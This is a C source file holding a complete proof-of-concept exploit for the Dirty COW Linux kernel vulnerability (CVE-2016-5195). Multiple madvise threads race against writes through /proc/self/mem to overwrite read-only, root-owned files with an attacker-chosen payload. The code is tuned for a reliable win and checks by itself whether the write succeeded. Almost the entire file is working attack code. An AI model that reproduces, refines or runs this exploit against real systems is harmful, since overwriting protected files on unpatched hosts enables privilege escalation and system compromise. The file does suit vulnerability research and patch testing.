/*
 * Dirty COW (CVE-2016-5195) PoC.
 *
 * Races madvise(MADV_DONTNEED) against a write through /proc/self/mem on a
 * private read-only mapping of a root-owned file, overwriting its page-cache
 * (and thus on-disk) bytes without write permission to the file.
 *
 * To win reliably on a 2-vCPU host the PoC:
 *   - pre-faults the mapped page,
 *   - spawns several madvise threads and several /proc/self/mem-writer threads
 *     so the TOCTOU window is hit at high frequency,
 *   - self-polls the backing file and exits 0 the instant the write lands.
 *
 * Usage: ./dirtyc0w <target-file> <payload> [seconds]
 */
#define _GNU_SOURCE
#include <errno.h>
#include <limits.h>
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#include <fcntl.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Number of madvise threads and /proc/self/mem writer threads main() starts. */
enum { NMADV = 4, NWRITE = 4 };

/*
 * State shared between main() and the worker threads. Everything except
 * `stop` is assigned by main() before any worker thread is created.
 */
static void *map;           /* base address of the private read-only mapping */
static int f;               /* descriptor of the opened target file */
static struct stat st;      /* fstat() of the target; st_size is the mapping length */
static char *payload;       /* bytes expected at the start of the file */
static size_t payload_len;  /* strlen(payload) */
/*
 * Set to 1 by main() to make the workers leave their loops. Atomic rather
 * than volatile: volatile does not make concurrent read/write race-free in
 * C11; plain reads/writes of an atomic_int are sequentially-consistent
 * atomic loads/stores, so existing `!stop` / `stop = 1` uses stay valid.
 */
static atomic_int stop = 0;

/*
 * Worker thread: call madvise(MADV_DONTNEED) over the whole mapping
 * (st.st_size bytes starting at `map`) in a tight loop until `stop` is set.
 * The madvise return value is intentionally not checked.
 */
static void *madviseThread(void *arg)
{
    (void)arg;
    for (;;) {
        if (stop)
            break;
        madvise(map, st.st_size, MADV_DONTNEED);
    }
    return NULL;
}

/*
 * Worker thread: open /proc/self/mem read-write, then repeatedly seek to the
 * address of `map` and write the payload there until `stop` is set.
 * Write failures are ignored on purpose and the loop simply retries.
 * Returns NULL (after reporting via perror) if /proc/self/mem can't be opened.
 */
static void *procselfmemThread(void *arg)
{
    (void)arg;
    int memfd = open("/proc/self/mem", O_RDWR);
    if (memfd < 0) {
        perror("open /proc/self/mem");
        return NULL;
    }
    for (;;) {
        if (stop)
            break;
        lseek(memfd, (off_t)(uintptr_t)map, SEEK_SET);
        ssize_t wr = write(memfd, payload, payload_len);
        (void)wr; /* transient EFAULT during the race is expected */
    }
    close(memfd);
    return NULL;
}

/*
 * Return 1 if the first payload_len bytes of the file at `path` equal the
 * global `payload`, else 0. Any failure (open, allocation, read error, or EOF
 * before payload_len bytes) is reported as 0 so the caller simply polls again.
 */
static int file_matches(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return 0;

    /* malloc(0) may return NULL; always request at least one byte. */
    char *buf = malloc(payload_len ? payload_len : 1);
    if (buf == NULL) {
        close(fd);
        return 0;
    }

    /* A single read() may return short or fail with EINTR; keep reading
     * until the full prefix is in, EOF is hit, or a real error occurs. */
    size_t got = 0;
    while (got < payload_len) {
        ssize_t n = read(fd, buf + got, payload_len - got);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            break;
        }
        if (n == 0)
            break; /* file shorter than the payload */
        got += (size_t)n;
    }
    close(fd);

    int ok = (got == payload_len) && (memcmp(buf, payload, payload_len) == 0);
    free(buf);
    return ok;
}

/*
 * Entry point. Validates arguments, opens the target read-only and maps it
 * MAP_PRIVATE/PROT_READ, starts NMADV madvise workers and NWRITE
 * /proc/self/mem writer workers, then polls the file every 10 ms until it
 * begins with the payload or the time budget (seconds, default 60) expires.
 *
 * Exit status: 0 if the payload was observed in the file, 1 on timeout,
 * 2 on usage or setup errors.
 */
int main(int argc, char *argv[])
{
    if (argc < 3) {
        fprintf(stderr, "usage: %s <target-file> <payload> [seconds]\n", argv[0]);
        return 2;
    }

    char *name = argv[1];
    payload = argv[2];
    payload_len = strlen(payload);
    /* An empty payload would make file_matches() succeed immediately and
     * report a false success. */
    if (payload_len == 0) {
        fprintf(stderr, "[!] payload must not be empty\n");
        return 2;
    }

    int budget = 60;
    if (argc >= 4) {
        /* strtol rather than atoi: atoi turns garbage or out-of-range input
         * into 0 (an instant timeout) without any diagnostic. */
        char *end = NULL;
        errno = 0;
        long v = strtol(argv[3], &end, 10);
        if (end == argv[3] || *end != '\0' || errno == ERANGE || v <= 0 || v > INT_MAX) {
            fprintf(stderr, "[!] invalid seconds: %s\n", argv[3]);
            return 2;
        }
        budget = (int)v;
    }

    f = open(name, O_RDONLY);
    if (f < 0) { perror("open target"); return 2; }
    if (fstat(f, &st) < 0) { perror("fstat"); return 2; }
    if ((size_t)st.st_size < payload_len) {
        fprintf(stderr, "[!] payload longer than file\n");
        return 2;
    }

    printf("[*] target=%s size=%lld payload_len=%zu budget=%ds threads=%dm/%dw\n",
           name, (long long)st.st_size, payload_len, budget, NMADV, NWRITE);

    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    if (map == MAP_FAILED) { perror("mmap"); return 2; }
    printf("[*] mmap %p\n", map);

    /* Pre-fault the page into the private mapping. */
    volatile char sink = ((volatile char *)map)[0];
    (void)sink;

    /* Count the threads that actually started so only those are joined:
     * pthread_join on a pthread_t that was never created is undefined. */
    pthread_t mt[NMADV], wt[NWRITE];
    int nmt = 0, nwt = 0;
    int spawn_err = 0;
    while (!spawn_err && nmt < NMADV) {
        spawn_err = pthread_create(&mt[nmt], NULL, madviseThread, NULL);
        if (!spawn_err)
            nmt++;
    }
    while (!spawn_err && nwt < NWRITE) {
        spawn_err = pthread_create(&wt[nwt], NULL, procselfmemThread, NULL);
        if (!spawn_err)
            nwt++;
    }

    time_t start = time(NULL);
    int won = 0;
    while (!spawn_err && time(NULL) - start < budget) {
        if (file_matches(name)) { won = 1; break; }
        struct timespec ts = { 0, 10 * 1000 * 1000 };
        nanosleep(&ts, NULL);
    }
    stop = 1;
    for (int i = 0; i < nmt; i++) pthread_join(mt[i], NULL);
    for (int i = 0; i < nwt; i++) pthread_join(wt[i], NULL);

    if (spawn_err) {
        /* pthread_create returns the error number rather than setting errno. */
        fprintf(stderr, "[!] pthread_create: %s\n", strerror(spawn_err));
        return 2;
    }
    if (won) {
        printf("[+] COW-WON: target first bytes overwritten with payload\n");
        return 0;
    }
    fprintf(stderr, "[-] COW-TIMEOUT within %ds\n", budget);
    return 1;
}
